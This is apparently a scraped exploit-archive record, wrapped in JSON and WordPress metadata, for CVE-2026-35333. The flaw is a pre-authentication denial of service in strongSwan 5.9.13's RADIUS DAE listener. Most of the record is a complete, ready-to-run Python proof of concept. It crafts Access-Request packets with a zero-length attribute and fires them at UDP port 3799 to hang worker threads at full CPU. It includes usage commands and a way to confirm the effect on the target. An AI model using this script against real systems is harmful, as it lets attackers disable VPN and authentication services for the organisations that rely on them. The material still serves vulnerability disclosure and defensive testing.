{“lastseen”:”2026-05-29T16:17:13″,”description”:”strongSwan version 5.9.13 suffers from a denial of service vulnerability…”,”published”:”2026-05-29T00:00:00″,”modified”:”2026-05-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 strongSwan 5.9.13 Denial of Service”,”source”:””,”references”:””,”id”:”PACKETSTORM:222182″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-35333″],”sourceData”:”# Exploit Title: strongSwan 5.9.13 – DoS\\n # Date: 2026-05-13\\n # Exploit Author: Lukas Johannes Moeller\\n # Vendor Homepage: https:\/\/www.strongswan.org\/\\n # Software Link: https:\/\/download.strongswan.org\/strongswan-5.9.13.tar.bz2\\n # Version: strongSwan \\u003c= 5.9.13 (eap-radius plugin built with DAE enabled)\\n # Tested on: Debian 12 bookworm, charon 5.9.13 built from upstream tarball,\\n # strongswan.conf charon.plugins.eap-radius.dae.enable = yes,\\n # listener bound on UDP\/3799\\n # CVE: CVE-2026-35333\\n # References:\\n # https:\/\/github.com\/strongswan\/strongswan\/commit\/e067d24293\\n # https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-35333\\n # https:\/\/github.com\/JohannesLks\/CVE-2026-35333\\n #\\n # Description:\\n # attribute_enumerate() in src\/libradius\/radius_message.c walks the\\n # attribute list of a RADIUS message without rejecting an attribute\\n # whose length byte is 0. For length == 0, this-\\u003enext never advances\\n # and the per-attribute length computation `this-\\u003enext-\\u003elength -\\n # sizeof(rattr_t)` underflows to (size_t)-2. The result is an\\n # infinite loop pegging one charon worker thread at 100% CPU.\\n #\\n # The reachability detail that turns this into a pre-auth bug:\\n # radius_message_t::verify() uses the SAME broken iterator to find\\n # Message-Authenticator BEFORE the Response-Authenticator MD5 check\\n # is applied. For RADIUS code 1 (Access-Request) verify() skips the\\n # MD5 check entirely. So a malformed Access-Request with a single\\n # zero-length attribute as its first attribute traps the worker\\n # thread without any knowledge of the DAE shared secret.\\n #\\n # N packets exhaust N worker threads -\\u003e full DAE denial of service.\\n #\\n # Usage:\\n # python3 strongswan-5.9.13-radius-dae-dos.py –target 10.0.0.1\\n # python3 strongswan-5.9.13-radius-dae-dos.py –target 10.0.0.1 –count 8\\n #\\n # Observe on the target:\\n # ps -L -p $(pidof charon) -o tid,pcpu,stat,wchan:25,cmd\\n # -\\u003e one or more threads in state R at ~100% CPU, never returning.\\n #\\n # Disclaimer:\\n # For authorized testing and defensive research only. Do not use\\n # against systems you do not own or have explicit permission to test.\\n \\n import argparse\\n import os\\n import socket\\n import struct\\n import sys\\n import time\\n \\n ACCESS_REQUEST = 1\\n RAT_USER_NAME = 1\\n \\n \\n def build_zero_length_attr_packet() -\\u003e bytes:\\n identifier = os.urandom(1)[0]\\n authenticator = os.urandom(16)\\n \\n # 20-byte RADIUS header + 2-byte attribute (type=User-Name, length=0)\\n total_len = 22\\n header = struct.pack(\\”!BBH16s\\”,\\n ACCESS_REQUEST,\\n identifier,\\n total_len,\\n authenticator)\\n attribute = struct.pack(\\”!BB\\”, RAT_USER_NAME, 0)\\n return header + attribute\\n \\n \\n def send_packet(packet: bytes, target: str, port: int, wait: float) -\\u003e None:\\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\\n sock.settimeout(wait)\\n sock.sendto(packet, (target, port))\\n print(f\\”[+] sent {len(packet)} bytes to {target}:{port}\/udp\\”)\\n try:\\n data, addr = sock.recvfrom(4096)\\n print(f\\”[-] unexpected response {len(data)} bytes from {addr}:\\”\\n f\\” {data[:32].hex()}\\”)\\n except socket.timeout:\\n print(f\\”[+] no response within {wait:.1f}s — expected for hung worker\\”)\\n finally:\\n sock.close()\\n \\n \\n def main() -\\u003e int:\\n p = argparse.ArgumentParser(\\n description=\\”CVE-2026-35333 strongSwan RADIUS DAE pre-auth DoS\\”\\n )\\n p.add_argument(\\”–target\\”, required=True,\\n help=\\”DAE listener IPv4 address (e.g. 10.0.0.1)\\”)\\n p.add_argument(\\”–port\\”, type=int, default=3799,\\n help=\\”DAE listener UDP port (default: 3799)\\”)\\n p.add_argument(\\”–count\\”, type=int, default=1,\\n help=\\”Number of crafted packets to send (default: 1)\\”)\\n p.add_argument(\\”–wait\\”, type=float, default=2.0,\\n help=\\”Per-packet response timeout in seconds (default: 2.0)\\”)\\n args = p.parse_args()\\n \\n payload = build_zero_length_attr_packet()\\n for i in range(args.count):\\n print(f\\”\\\\n[*] crafted packet #{i + 1}: Access-Request with \\”\\n \\”zero-length User-Name attribute\\”)\\n send_packet(payload, args.target, args.port, args.wait)\\n time.sleep(0.2)\\n \\n print(\\”\\\\n[+] done; expected effect: one charon worker thread per packet \\”\\n \\”stuck at 100% CPU.\\”)\\n print(\\” Verify on the target with: ps -L -p $(pidof charon) \\”\\n \\”-o tid,pcpu,stat,wchan:25,cmd\\”)\\n return 0\\n \\n \\n if __name__ == \\”__main__\\”:\\n sys.exit(main())”,”sourceHref”:”https:\/\/packetstorm.news\/download\/222182″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/222182\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-29T16:17:13″,”description”:”strongSwan version 5.9.13 suffers from a denial of service vulnerability…”,”published”:”2026-05-29T00:00:00″,”modified”:”2026-05-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 strongSwan 5.9.13 Denial of Service”,”source”:””,”references”:””,”id”:”PACKETSTORM:222182″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-35333″],”sourceData”:”# Exploit Title: strongSwan 5.9.13 – DoS\\n # Date: 2026-05-13\\n #…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-58263","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n